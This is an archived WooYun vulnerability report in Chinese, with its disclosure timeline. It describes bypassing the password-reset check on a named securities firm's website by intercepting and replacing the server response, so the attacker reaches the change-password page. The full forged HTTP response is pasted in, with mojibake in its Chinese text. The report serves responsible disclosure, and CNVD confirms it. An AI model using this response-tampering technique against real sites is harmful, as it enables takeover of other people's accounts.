乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-17: 细节已通知厂商并且等待厂商处理中 2015-06-22: 厂商已经确认,细节仅向厂商公开 2015-07-02: 细节向核心白帽子及相关领域专家公开 2015-07-12: 细节向普通白帽子公开 2015-07-22: 细节向实习白帽子公开 2015-08-06: 细节向公众公开
你懂得
http://www.bocichina.com/boci/login/forgetPassword.jsp
就这个了
回答问题随便填,抓包。讲返回的包拦截,将以下包发出去!
HTTP/1.1 200 OKDate: Tue, 16 Jun 2015 21:04:08 GMTServer: ApacheX-Powered-By: Servlet/2.5 JSP/2.1Content-Type: text/html;charset=UTF-8Connection: Keep-aliveKeep-Alive: timeout=15, max=100Via: 1.1 ID-0000627501262144 uproxy-2Content-Length: 5035<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link href="/boci/css/css.css" type="text/css" rel="stylesheet" /><script type="text/javascript" src="/boci/share/js/jsUtils.js"></script><title>ä¸é¶å½é è¯å¸</title><link rel="shortcut icon" href="/boci/pic/favicon.ico"/><link rel="BookMark" href="/boci/pic/favicon.ico"/><style type="text/css"><!--.STYLE1 {color: #920022}.STYLE2 {color: #348800}.STYLE5 { font-family:"微软é é»", "å®ä½"; font-size: 18px; font-weight: bold; padding:10px;}--></style></head><script></script><script>function check(){var password=document.getElementById("passWord").value;if(/^([A-Z]|[a-z]|[\d])*$/.test(password)==false||password.length<6||password.length>12){alert("å¯ç 为 6-12 ä½åæ¯ææ°å");document.getElementById("passWord").value="";document.getElementById("passWord").focus();return false;}//æ°å¯ç åæ§å¯ç æ¯å¦ç¸åvar password_1=document.getElementById("passWord_1").value;if(password!=password_1){alert("两次è¾å ¥å¯ç ä¸ç¸å");document.getElementById("passWord_1").value="";document.getElementById("passWord_1").focus();return false;}}</script><body><div id="layout"><table width="500" border="0" cellspacing="0" cellpadding="0"> <tr> <td> <table width="900" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#ffffff" height="60"> <tr> <td><a href="/boci/index/index.jsp?firstMenu=qtcd_index"><img src="/boci/pic/logo.jpg" width="315" height="60" border="0" /></a></td> <td width="427"></td> </tr> </table> <table width="900" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#ffffff"> <tr> <td width="900" background="/boci/pic/menu_07.jpg"><img src="/boci/pic/menu_07.jpg" width="6" height="13" /></td> </tr> </table></td> </tr></table><table width="900" border="0" cellspacing="0" cellpadding="0"><form action="/boci/user.do?method=updatePassword" method="post" name="thisForm" id="thisForm" onsubmit="return check()"> <tr> <td width="20"></td> <td height="35" background="/boci/pic/zcgl_30.jpg" class="text14" style="padding-left:60px;">å¿è®°å¯ç </td> <td width="20"></td> </tr> <tr> <td></td> <td height="35" style="padding:10px; line-height:25px;"><p><table width="750" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td><img src="/boci/pic/login/tab_top.gif" height="11" /></td> </tr> <tr> <td valign="top" background="/boci/pic/login/tab_mid.gif" style="padding:10px 20px;"><table width="33%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td height="10"></td> </tr> </table> <table width="35%" border="0" cellpadding="0" cellspacing="0" align="center"> <tr align="left" bgcolor="#F2F2F2"> <td colspan="3" style="padding: 2px 15px;">请è¾å ¥æ°å¯ç ï¼ <input name="passWord" id="passWord" type="password" class="sousuotiao" size="18" style="border:1px solid #cccccc;" /> </td> </tr> <tr align="left" bgcolor="#F2F2F2"> <td colspan="3" style="padding: 2px 15px;">æ° å¯ç 确认 ï¼ <input name="passWord_1" id="passWord_1" type="password" class="sousuotiao" size="18" style="border:1px solid #cccccc;" /> </td> </tr> </table> <table width="97" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td height="20"></td> </tr> </table> <table width="33%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr align="center"> <td height="15"><input type="submit" name="Submit2" value="ç¡®å®" class="button4" /></td> </tr> </table> </td> </tr> <tr> <td align="center"><img src="/boci/pic/login/tab_bot.gif" height="11" /></td> </tr> </table></td> <td></td> </tr> <tr> <td></td> <td height="35" class="text14" style="padding-left:10px;"> </td> <td></td> </tr></form></table><table width="900" border="0" cellspacing="0" cellpadding="0"> <tr> <td><iframe src="/boci/share/foot.jsp" frameborder="0" width="900" height="64" scrolling="no"></iframe></td> </tr></table></div></body></html>
成功跳刀更改密码处
危害等级:高
漏洞Rank:11
确认时间:2015-06-22 09:59
cnvd确认并复现所述情况,转由cncert向证券行业信息化主管部门通报,由其后续协调网站管理单位处置。
暂无